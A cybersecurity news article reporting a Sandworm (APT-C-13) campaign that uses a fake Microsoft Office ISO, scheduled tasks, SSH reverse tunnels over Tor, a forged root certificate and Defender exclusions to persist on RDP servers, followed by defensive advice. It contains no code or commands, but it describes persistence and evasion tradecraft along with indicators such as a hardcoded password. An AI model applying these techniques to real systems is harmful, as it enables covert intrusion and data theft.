APT Hackers Exploit RDP Servers to Deploy Malware, Establish Persistence
Key Takeaways A sophisticated state-sponsored threat actor, known as APT-C-13 (Sandworm), has shifted its strategy from destructive attacks to long-term intelligence gathering. The group is actively...
Key Takeaways
- A sophisticated state-sponsored threat actor, known as APT-C-13 (Sandworm), has shifted its strategy from destructive attacks to long-term intelligence gathering.
- The group is actively targeting critical infrastructure, defense organizations, and government agencies, particularly in Ukraine, by exploiting Remote Desktop Protocol (RDP) servers.
- The attack chain leverages social engineering via a fake Microsoft Office ISO image to deploy a modular penetration framework (Tambur/Sumbur/Kalambur series).
- Attackers establish covert persistence and exfiltrate data undetected by using legitimate Windows tools, SSH reverse tunnels, Tor, and by injecting forged root certificates.
APT-C-13 Shifts Tactics to Long-Term RDP Infiltration
One of the world’s most formidable state-backed hacking groups, identified as APT-C-13 and widely known by aliases such as Sandworm, APT44, Seashell Blizzard, and Voodoo Bear, is actively exploiting Remote Desktop Protocol (RDP) servers. This group, with a history of cyber operations dating back to at least 2009, is now focusing its efforts on critical infrastructure, defense organizations, and government agencies.
Table Of Content
- Key Takeaways
- APT-C-13 Shifts Tactics to Long-Term RDP Infiltration
- Initial Infection Vector and Malware Deployment
- Persistence Through RDP Hijacking and Covert Tunneling
- Scheduled Tasks and Credential Theft
- Anonymous Command and Control and Remote Access
- Security Evasion and System Compromise
- What You Should Do
This latest campaign signifies a notable strategic evolution for APT-C-13. Instead of executing immediate, destructive cyberattacks, the group is now prioritizing stealthy, prolonged infiltration designed to harvest intelligence over extended periods. This represents a move from “instantaneous disruption” to “intelligence-driven persistent parasitism,” a calculated shift observed between 2024 and 2026, according to researchers.
Initial Infection Vector and Malware Deployment
The campaign initiates with a deceptive ISO image, named Microsoft.Office.2025x64.v2025.iso. This malicious file is distributed primarily through Telegram channels and software cracking communities prevalent in Ukraine. Victims are lured into mounting this image and attempting to install or activate what appears to be legitimate Microsoft Office software.
Upon execution, hidden executables, disguised as auto.exe or setup.exe, are silently launched in the background. This social engineering tactic capitalizes on user trust in familiar software names. Once activated, an initial loader profiles the compromised system before selectively deploying additional malicious modules.
Analysts at the 360 Threat Intelligence Center, specifically Weixin, have meticulously tracked this campaign. They confirmed that APT-C-13 is deploying a sophisticated modular penetration framework, collectively referred to as the Tambur/Sumbur/Kalambur series. A confirmed victim includes a technician at a Ukrainian state-owned shipbuilding and machinery manufacturing plant, where the attackers had already established deep, covert access.
The gravity of this campaign is substantial. A primary concern is the attackers’ reliance on legitimate Windows tools, including scheduled tasks, SSH, PowerShell, and RDP. This tactic often allows the malicious activity to bypass detection by conventional antivirus solutions, leaving organizations vulnerable for prolonged periods. The group’s patient approach means they can remain embedded for months, slowly exfiltrating sensitive data from within an organization’s trusted network. By the time an intrusion is detected, the attackers have likely already achieved their intelligence objectives.
Persistence Through RDP Hijacking and Covert Tunneling
A critical aspect of this campaign is the attackers’ advanced methods for establishing and maintaining covert, long-term persistence within compromised environments.
Scheduled Tasks and Credential Theft
The Tambur module plays a key role in persistence by creating scheduled tasks named “Tambur” and “Protector.” These tasks are strategically placed within the MicrosoftWindowsWDIProtector path, a location designed to mimic a native Windows Diagnostic Infrastructure component, thereby evading suspicion. These tasks execute with full administrator-level privileges and utilize a hardcoded password, 1qaz@WSX, to ensure constant and uninterrupted access to the RDP service on the infected host.
Anonymous Command and Control and Remote Access
The Kalambur and Sumbur modules further enhance operational security by routing all command-and-control (C2) traffic through the Tor anonymous network, effectively concealing the attackers’ true geographical location. Leveraging SSH reverse tunneling, the attackers map the victim’s RDP port (3389) to a remote C2 server. This technique allows for silent remote logins from any global location. Sumbur, an improved iteration of this framework, masquerades as Microsoft Edge’s update service, storing malicious VBScripts in a fake Edge update directory and triggering them every four hours to blend seamlessly with routine software update activities.
Security Evasion and System Compromise
The attack concludes with the DemiMur module, which injects a forged root certificate named DemiMurCA.crt into the system’s trusted certificate store. This critical step causes Windows to treat all subsequent malicious payloads as fully trusted and signed. Coupled with forced Microsoft Defender exclusions that encompass the entire C drive, the host’s native security mechanisms are completely neutralized, providing the attackers with an unmonitored and undetected operating environment.
What You Should Do
- Block Unauthorized Software: Immediately implement policies to block third-party activation tools and unauthorized ISO images from entering network environments.
- Enhanced Network Monitoring: Implement robust internal network behavior monitoring, focusing on scheduled task creation, registry modifications, and PowerShell execution for anomalous activity.
- Endpoint Security: Ensure all endpoint security solutions are fully updated and configured for regular, comprehensive scans. Consider advanced endpoint detection and response (EDR) solutions.
- Strengthen Auditing: Key institutions and industrial organizations should enhance internal auditing practices and develop specific detection rules targeting unusual RDP and SSH activity patterns.
- User Awareness Training: Educate users about the risks of downloading and executing software from unofficial sources, particularly those promising “cracked” or free versions of commercial software.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.